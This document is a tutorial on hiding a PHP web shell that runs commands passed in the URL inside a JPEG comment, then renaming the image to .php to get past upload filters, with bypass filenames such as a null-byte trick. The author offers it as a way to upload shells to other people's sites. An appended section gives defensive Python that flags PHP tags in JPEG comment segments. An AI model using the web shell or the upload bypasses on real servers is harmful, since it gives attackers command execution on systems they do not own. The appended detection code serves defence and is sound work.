What do we need?
an image (with the extension .JPG or .JPEG)
a program called edjpgcom.exe
www.softpedia.com
And some PHP code (of your choice)
For this tutorial we will use this code:
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "</pre>";
?>
What can you do with this code?
Well, with this you can execute commands. For example,
if you go to index.php (with this code) you can type this in:
index.php?hackflag=ping google.nl
and it will ping Google and write the output into the PHP page.
Ok… Let's get started!
So first we take a random JPG image; I have one of a fish.
We drag this image (vis.jpg) onto edjpgcom.exe.
Now a screen will appear.
In this screen you now type your PHP code;
in my case it is this:
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "</pre>";
?>
Now click OK.
If you look at the image's source now, you will see the script.
The image will still work (by the way, the image also works if you rename it to .TXT, which is quite funny).
Now we rename it to .PHP.
Now a lot of garbled text will appear; that is the raw source of the image.
OK, time to test it!
First let's ping Google:
127.0.0.1/vis.php?hackflag=ping google.nl
And yes it works!
Now you may be wondering: what's in this for me?
Sometimes you try to upload a shell but you can't, because it's PHP, even if you use bypass techniques (vis.php;jpg | vis.php%00.jpg).
But now the site will think it's a real picture, giving you a better chance of uploading it!
I hope someone learns something from it.
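Seen from the upload handler's side, the comment that edjpgcom writes sits in a JPEG COM segment (marker 0xFFFE), so it can be inspected before a file is accepted. The following check is an added example, not part of the original post: it walks the segment headers and flags comments containing a PHP open tag. The function names and the two sample byte strings are constructed for illustration.

```python
import re
import struct

# Markers that carry no length field: TEM, SOI, EOI and RST0-RST7.
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))
# Byte patterns that start PHP parsing: <?php, <?= and the short tag "<? ".
PHP_OPEN = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each header segment up to start-of-scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:              # fill byte in front of a marker
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("truncated or malformed segment")
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:              # SOS: entropy-coded image data follows
            return
        pos += 2 + length


def suspicious_comments(data: bytes):
    """Return COM (0xFFFE) payloads that contain a PHP open tag."""
    return [p for m, p in jpeg_segments(data) if m == 0xFE and PHP_OPEN.search(p)]


def seg(marker: int, payload: bytes) -> bytes:
    # Helper that builds one length-prefixed segment for the samples below.
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed samples: header-only JPEG skeletons, not real photos.
APP0 = seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
CLEAN = b"\xff\xd8" + APP0 + seg(0xFE, b"fish, 2019") + b"\xff\xd9"
TAINTED = b"\xff\xd8" + APP0 + seg(0xFE, b"<?php /* placeholder */ ?>") + b"\xff\xd9"
```

A hit here is one signal only. As the rename step above shows, the embedded code runs only when the server serves the file through its PHP handler, so storing uploads under server-generated names in a location where PHP is not executed is what actually stops it.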